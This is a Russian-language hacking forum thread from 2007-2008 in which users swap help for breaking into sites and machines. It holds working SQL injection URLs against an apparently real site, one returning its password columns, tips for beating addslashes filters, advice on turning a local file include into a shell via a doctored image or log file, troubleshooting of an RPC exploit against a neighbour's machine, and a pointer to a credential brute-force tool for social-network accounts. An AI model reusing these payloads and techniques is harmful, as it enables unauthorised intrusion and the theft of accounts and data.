Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Fuckel

    Fuckel Banned

    Joined:
    16 Jan 2008
    Messages:
    274
    Likes Received:
    59
    Reputations:
    6
    если не ошибаюсь использовал kaht? если да, то у тебя все права. вперед и с песней.
     
  2. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    438
    Likes Received:
    164
    Reputations:
    -19
    Дело в том что я попытался юзать его но он не хочет токо RPC GUI v2 - r3L4x.exe конектиться к нему, но он ниче не делает а точнее я там пишу все равно не делает в cmd на удаленке
     
  3. Parampapam

    Parampapam New Member

    Joined:
    29 Sep 2008
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Ребят, подскажите куда копать...

    есть типичный сайт, с типичным параметром id=1234...

    ' " экранируются слешем \'

    order by, group by, limit проходят.

    ; - нет, сразу ругается SELECT * FROM objs WHERE id=-1 ... ;

    пробовал union select 1,...100 (через софт) - не проходит.

    Ещё из, возможно, интересного - структура построена на /?alias=section, при изменении section -- пустой экран.
     
  4. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    337
    Likes Received:
    142
    Reputations:
    81
    у мя вот примерно такаяже проблема как у дизнта , я в локале нашол уязвимую тачку пробую запустить експлоит вроде все норм запускаеться :
    [​IMG]
    но как видно на скрине команды тупо не выполняються... искал я на ету тему в гугле инфу нашол скрин удачного пробивава етим сплоитом и там после WooT вылетала командная строка а тут нет... Как етого можно добиться?
     
  5. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    438
    Likes Received:
    164
    Reputations:
    -19
    warlok +500 не выполняються команды! ВОЗМУТИТЕЛЬНО!
     
  6. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,364
    Likes Received:
    1,134
    Reputations:
    430
    Обновления может стоят... фиревол, антивирус...
     
  7. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    337
    Likes Received:
    142
    Reputations:
    81
    вот етого я незнаю что у него там стоит))) но тип етот самоувереный болван)
     
    1 person likes this.
  8. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Фаил прив всяко нету,а пароли никто не может расшифровать пле).Да и потом,толку иметь логин пароль от админки,не имея доступа к админке ?
     
  9. AHMED HASSAN

    AHMED HASSAN New Member

    Joined:
    25 Apr 2007
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    NEED HELP WITH THIS

    /showdetials.php?id=53%20union%20select%201,2,3,4,5,6,7,8,9,10,database(),12,13,14,15%20--

    IT WORKS WILL

    AFTER I DO WITH INFORMATION_SCHEMA.TABLES

    /showdetials.php?id=53%20union%20select%201,2,3,4,5,6,7,8,9,10,concat(table_name,0x3e,column_name,0x3e,table_schema)
    ,12,13,14,15%20from%20information_schema.columns%20WHERE%20column_name%20LIKE%20CHAR(37,112,97,115,115,37)--

    NOTHING I DIDNT SEE THIS BEFORE SO PLS HELP
     
  10. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    showdetials.php?id=53+union+select+1,2,3,4,5,6,7,8,9,10,UNHEX(HEX(concat(table_name,0x3e,column_name,0x3e,table_schema))),12,13,14,15+from+information_schema.columns+WHERE+column_name+LIKE+CHAR(37,112,97,115,115,37)/*



    Code:
     13  	
    course_enroll>course_enroll_pass>elearn
    
    التاريخ : 8
    	
    13 	
    dept_member>PASS>elearn
    
    التاريخ : 8
    	
    13 	
    members>PASS>elearn
    
    ...
    ...
    
    ;)
     
    #3390 Red_Red1, 2 Oct 2008
    Last edited: 2 Oct 2008
    3 people like this.
  11. AHMED HASSAN

    AHMED HASSAN New Member

    Joined:
    25 Apr 2007
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    showdetials

    U DID GOOGLE ON THIS

    HAHA THANX MAN U REALY APRO

    BUT IT APPEARS ON WHAT SOURCE OR WHAT
     
  12. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    admin_access
    admin_groups
    content_categories_est
    content_categories_rus
    content_links_eng
    content_links_est
    content_links_rus
    content_objects_eng
    content_objects_est
    content_objects_rus
    ctlg_projects
    gallery
    news_eng
    news_est
    news_rus
    nlsbo_est
    nlsbo_rus
    nlsf_est
    nlsf_rus
    sets_languages
    users_sess

    Кто-нибудь знает,от какого-то это двига ? А то куча логинов/паролей,а толку никакого)).Сканеры директорий ничего не нашли,порты стандартные(21,22,80).Может пользовался ими кто.Не найти никак админку,ибо пути явно нестандартные... =_=

    ЗЫ: В первом находятся логин/пароль,а в последнем - сессия.
     
  13. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Вопрос для всех! Извените если пишу не по теме просто не знаю куда писать!

    Мне взлломали контакт! Без мыла как это зделали,,,,???
    Кто знает отпешите если есть пост кинте сылку!!!
     
  14. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5

    Скрипт наверника самописный! А вобще скинь сылочку нада так посмотреть!
     
    1 person likes this.
  15. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    438
    Likes Received:
    164
    Reputations:
    -19
    я в локале нашол уязвимую тачку пробую запустить експлоит вроде все норм запускаеться :

    http://avoreg.ru/pic_b/b2c6499060567ddbff7fc2e67c484d33.jpg

    но как видно на скрине команды тупо не выполняються... искал я на ету тему в гугле инфу нашол скрин удачного пробивава етим сплоитом и там после WooT вылетала командная строка а тут нет... Как етого можно добиться?

    ЗЫ

    geforce просто человек собрал базу мыл (где присуствовало твое мыло) и просто в тупую перебирал эти мыла вконтакте на один пароль вот и попадаються такие
     
    #3395 diznt, 3 Oct 2008
    Last edited: 3 Oct 2008
  16. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    А чем переберал есть такая прога или это скрипт какойто! Если не секрет подскажи что где и как скачать!???
     
  17. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    438
    Likes Received:
    164
    Reputations:
    -19
    http://grabberz.com/showthread.php?t=7819

    (сори если реклама)
    а вообще юзай гугл по этому делу

    (на сайте у них все надо сохранять в .pl формате и потом юзать как эксплоит)!
     
  18. bq1foe

    bq1foe Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    38
    Likes Received:
    8
    Reputations:
    0
    В общажной локалке стоит сайт на денвере (2-м),на самом сайте нашел пхп-инклуд и скуль. В скуле все что можно ввести гонится через addslashes (),это можно как-то обойти? что касается инклуда он походу локальный,что из него можно вытащить? Я им пытался инклудить файлы из папки mysql4 но отображаются крякозябры) можно через это все както вытащить базу или получить шел или хотябы листинг дерикторий???
     
  19. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,390
    Likes Received:
    1,209
    Reputations:
    475
    bq1foe, поищи скрипт заливки какх нить файлов, например картинок, если найдёшь, вставляй в картинку шелл, заливай, инклудь
     
  20. o314um

    o314um Member

    Joined:
    16 Nov 2006
    Messages:
    227
    Likes Received:
    89
    Reputations:
    7
    попробуй длоги приинклудить с записанным шеллом, если нет залива.

    В скуле чтобы обойти фильтр, нужон захексить или зачарить символы. НО шелл залить через скулю не удастся
     
Loading...
Thread Status:
Not open for further replies.